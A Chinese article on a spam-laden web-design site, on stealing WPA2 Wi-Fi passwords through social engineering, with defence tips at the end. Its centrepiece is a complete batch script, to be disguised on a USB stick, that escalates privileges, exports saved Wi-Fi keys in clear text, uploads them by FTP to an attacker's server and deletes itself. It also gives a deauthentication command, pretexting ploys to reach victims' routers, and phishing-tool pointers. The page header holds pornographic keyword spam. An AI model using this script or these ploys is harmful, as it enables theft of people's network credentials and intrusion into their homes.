日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
常見社工破解WPA2密碼方法及防范措施

1. 前言

10余年的交城網(wǎng)站建設經(jīng)驗,針對設計、前端、開發(fā)、售后、文案、推廣等六對一服務,響應快,48小時及時工作處理。全網(wǎng)營銷推廣的優(yōu)勢是能夠根據(jù)用戶設備顯示端的尺寸不同,自動調(diào)整交城建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設計,從而大程度地提升瀏覽體驗。創(chuàng)新互聯(lián)從事“交城網(wǎng)站設計”,“交城網(wǎng)站推廣”以來,每個客戶項目都認真落實執(zhí)行。

何為社工?社工是一種通過利用受害者心理弱點,如本能反應、好奇心、同情心、信任、貪婪等進行諸如欺騙、盜取、控制等非法手段的一種攻擊方式。在無線安全中也可以利用社工做到許多非法操作。下面舉幾個利用社工盜取wpa2密碼的例子。

2. 移動存儲攻擊

某寶小容量u盤,在u盤中存放一個bat批處理文件,并命名為誘使人點開的標題,如:windows電腦優(yōu)化、私人照片等等。其實bat文件的內(nèi)容是這個:

 
 
 
 
    
  
  
  
  
  1. @echo off 
    2. 
  
  
  
  
  2. >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 
    3. 
  
  
  
  
  3. if '%errorlevel%' NEQ '0' ( 
    4. 
  
  
  
  
  4. goto UACPrompt 
    5. 
  
  
  
  
  5. ) else ( goto gotAdmin ) 
    6. 
  
  
  
  
  6. :UACPrompt 
    7. 
  
  
  
  
  7. echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 
    8. 
  
  
  
  
  8. echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs" 
    9. 
  
  
  
  
  9. "%temp%\getadmin.vbs" 
    10. 
  
  
  
  
  10. exit /B 
    11. 
  
  
  
  
  11. :gotAdmin 
    12. 
  
  
  
  
  12. if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) 
    13. 
  
  
  
  
  13. md c:\win 
    14. 
  
  
  
  
  14. netsh wlan export profile key=clear folder=c:\win 
    15. 
  
  
  
  
  15. echo open 服務器ip>C:\config.txt 
    16. 
  
  
  
  
  16. echo user 賬號>>C:\config.txt 
    17. 
  
  
  
  
  17. echo 密碼>>C:\config.txt 
    18. 
  
  
  
  
  18. echo mput c:\win\*.xml>>C:\config.txt 
    19. 
  
  
  
  
  19. echo yes>>C:\config.txt 
    20. 
  
  
  
  
  20. echo yes>>C:\config.txt 
    21. 
  
  
  
  
  21. echo yes>>C:\config.txt 
    22. 
  
  
  
  
  22. echo yes>>C:\config.txt 
    23. 
  
  
  
  
  23. echo yes>>C:\config.txt 
    24. 
  
  
  
  
  24. echo yes>>C:\config.txt 
    25. 
  
  
  
  
  25. echo yes>>C:\config.txt 
    26. 
  
  
  
  
  26. echo yes>>C:\config.txt 
    27. 
  
  
  
  
  27. echo yes>>C:\config.txt 
    28. 
  
  
  
  
  28. echo yes>>C:\config.txt 
    29. 
  
  
  
  
  29. echo yes>>C:\config.txt 
    30. 
  
  
  
  
  30. echo yes>>C:\config.txt 
    31. 
  
  
  
  
  31. echo yes>>C:\config.txt 
    32. 
  
  
  
  
  32. echo yes>>C:\config.txt 
    33. 
  
  
  
  
  33. echo yes>>C:\config.txt 
    34. 
  
  
  
  
  34. echo yes>>C:\config.txt 
    35. 
  
  
  
  
  35. echo yes>>C:\config.txt 
    36. 
  
  
  
  
  36. echo yes>>C:\config.txt 
    37. 
  
  
  
  
  37. echo yes>>C:\config.txt 
    38. 
  
  
  
  
  38. echo yes>>C:\config.txt 
    39. 
  
  
  
  
  39. echo yes>>C:\config.txt 
    40. 
  
  
  
  
  40. echo yes>>C:\config.txt 
    41. 
  
  
  
  
  41. echo yes>>C:\config.txt 
    42. 
  
  
  
  
  42. echo yes>>C:\config.txt 
    43. 
  
  
  
  
  43. echo yes>>C:\config.txt 
    44. 
  
  
  
  
  44. echo yes>>C:\config.txt 
    45. 
  
  
  
  
  45. echo yes>>C:\config.txt 
    46. 
  
  
  
  
  46. echo yes>>C:\config.txt 
    47. 
  
  
  
  
  47. echo yes>>C:\config.txt 
    48. 
  
  
  
  
  48. echo yes>>C:\config.txt 
    49. 
  
  
  
  
  49. echo yes>>C:\config.txt 
    50. 
  
  
  
  
  50. echo yes>>C:\config.txt 
    51. 
  
  
  
  
  51. echo yes>>C:\config.txt 
    52. 
  
  
  
  
  52. echo yes>>C:\config.txt 
    53. 
  
  
  
  
  53. echo yes>>C:\config.txt 
    54. 
  
  
  
  
  54. echo yes>>C:\config.txt 
    55. 
  
  
  
  
  55. echo yes>>C:\config.txt 
    56. 
  
  
  
  
  56. echo yes>>C:\config.txt 
    57. 
  
  
  
  
  57. echo yes>>C:\config.txt 
    58. 
  
  
  
  
  58. echo yes>>C:\config.txt 
    59. 
  
  
  
  
  59. echo yes>>C:\config.txt 
    60. 
  
  
  
  
  60. echo yes>>C:\config.txt 
    61. 
  
  
  
  
  61. echo yes>>C:\config.txt 
    62. 
  
  
  
  
  62. echo yes>>C:\config.txt 
    63. 
  
  
  
  
  63. echo yes>>C:\config.txt 
    64. 
  
  
  
  
  64. echo yes>>C:\config.txt 
    65. 
  
  
  
  
  65. echo yes>>C:\config.txt 
    66. 
  
  
  
  
  66. echo yes>>C:\config.txt
    67. 
  
  
  
  
  67. echo yes>>C:\config.txt 
    68. 
  
  
  
  
  68. echo yes>>C:\config.txt 
    69. 
  
  
  
  
  69. echo yes>>C:\config.txt 
    70. 
  
  
  
  
  70. echo yes>>C:\config.txt 
    71. 
  
  
  
  
  71. echo yes>>C:\config.txt 
    72. 
  
  
  
  
  72. echo bye>>C:\config.txt 
    73. 
  
  
  
  
  73. ftp -n -s:"C:\config.txt" 
    74. 
  
  
  
  
  74. del C:\config.txt 
    75. 
  
  
  
  
  75. del C:\win\*.xml 
    76. 
  
  
  
  
  76. del %0
    77.

這個bat腳本會讀取本機連接過的wifi信息(包括密碼)打包到一個文件夾里并全部put到服務器上,然后刪除痕跡和自身防止服務器信息泄露。最后攻擊者就可以在自己的ftp服務器里挑選自己中意的wifi了。

攻擊演示:

打開此腳本

彈出cmd界面,1秒后消失(太快了不好截),bat腳本也隨之消失

查看ftp服務器

wifi信息已經(jīng)put上來了

進入服務器打開一個xml文件

就拿到了密碼

可以自己在里面添加功能使社工效果更好,例如腳本名稱命名為某某公司有獎問卷調(diào)查,并添加打開調(diào)查問卷的命令,使攻擊神不知鬼不覺。

3. 直接接觸受害者

(1) 使用Deauthentication攻擊

 
 
 
 
    
  
  
  
  
  1. aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
    2.

在下班休息的時候(這個時候普遍在使用網(wǎng)絡)對受害者使用斷網(wǎng)攻擊,等一小時后去敲門,詢問網(wǎng)絡是否故障,詢問網(wǎng)絡是哪家公司配置的,然后聲稱自己的網(wǎng)絡也故障了,是一樣的公司,然后詢問報修電話并撥打,其實撥打的是其他人或根本沒有撥打,然后假裝是保修人員提示讓自己重啟路由器,攻擊者就可以接觸到受害者路由器,運氣好的話路由器背面有pin碼,就可以撤退了。如果沒有,攻擊者就進一步施壓,假裝被保修人員提示打開路由器管理界面在管理界面重啟路由器,乘機看到密碼。重啟完畢后手機ssh連接kali停止攻擊,造成重啟成功修復網(wǎng)絡的假象,然后撤退。

(2) 結(jié)合移動存儲攻擊,配合badusb,謊稱有重要文件需要發(fā)送然而手機沒電了,家里人還沒下班。第一天進公司不想留下壞印象,從而直接接觸受害者電腦,插入badusb,執(zhí)行bat腳本或木馬

(3) 謊稱自己是某某公司或某某大學的,正在進行網(wǎng)民安全意識的問卷調(diào)查,并將其中帶有提問wifi密碼的問卷遞交受害者,從而獲得wifi密碼

4. wifi釣魚

利用fluxion、wifiphisher等工具實施釣魚攻擊:

  • https://github.com/FluxionNetwork/fluxion
  • https://github.com/sophron/wifiphisher ——項目地址

它們的大概原理是抓取受害者客戶端與wifi的握手包,對目標客戶端實施wifi拒絕服務攻擊,發(fā)送大量解離包,然后偽造一個相同名稱的ap,受害者連接偽造的ap后會被解析到這個頁面:

受害者輸入密碼后會自動與抓取的握手包進行比對,若正確,則停止拒絕服務攻擊。網(wǎng)上有很多wifi釣魚的教程,這里就不再闡述。

4. 防御措施

  • 綁定mac地址,設置白名單,只允許自己的機器連接wifi
  • 隱藏wifi廣播,避免自己成為目標
  • 不要插入來路不明的u盤,不要打開來路不明的程序,不要連接來路不明的無線信號
  • 盡量不讓陌生人接觸到自己的設備
  • wifi最好使用wpa2加密,并使密碼復雜度越高越好,盡量別在密碼里使用和自己有關的信息
  • 定期更換路由器管理界面密碼和wifi密碼
  • 最好關閉路由器上的wps功能
  • 盡量不使用wifi萬能鑰匙等類似軟件

分享標題:常見社工破解WPA2密碼方法及防范措施
文章位置:http://www.5511xx.com/article/dpsjpsc.html